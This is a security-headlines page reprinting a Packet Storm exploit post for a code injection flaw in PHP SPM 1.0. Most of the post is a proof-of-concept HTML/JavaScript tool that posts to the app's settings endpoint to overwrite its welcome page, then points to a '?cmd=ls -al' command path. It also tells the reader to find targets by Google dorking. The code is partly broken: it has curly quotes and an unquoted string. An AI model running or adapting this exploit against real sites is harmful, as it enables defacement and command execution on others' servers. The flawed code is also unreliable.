Security
Headlines
HeadlinesLatestCVEs

Headline

PHP SPM 1.0 Code Injection

PHP SPM version 1.0 suffers from a PHP code injection vulnerability.

Packet Storm
#vulnerability#windows#google#php#auth#firefox

=============================================================================================================================================
| # Title : php spm 1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This code injects the malicious code you want into existing HTML files or creates a new HTML file and injects the payload.

[+] Line 11 Set your file name & payload.

[+] save payload as poc.html

[+] payload :

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title> PHP code injection Tool</title>
<script>
async function sendRequest() {
const url = document.getElementById(‘url’).value;
const postData = {
'content[welcome]': Hacked by indoushka
};

        try {  
            const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {  
                method: 'POST',  
                headers: {  
                    'Content-Type': 'application/x-www-form-urlencoded'  
                },  
                body: new URLSearchParams(postData).toString()  
            });

            if (response.ok) {  
                document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';

            } else {  
                document.getElementById('result').innerText = 'Error: ' + response.statusText;  
            }  
        } catch (error) {  
            document.getElementById('result').innerText = 'Error making request: ' + error.message;  
        }  
    }  
</script>  

</head>
<body>
<h1>Injection Tool</h1>
<form onsubmit="event.preventDefault(); sendRequest();">
<label for="url">Enter URL:</label>
<input type="text" id="url" name="url" required>
<button type="submit">Submit</button>
</form>
<pre id="result"></pre>
</body>
</html>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution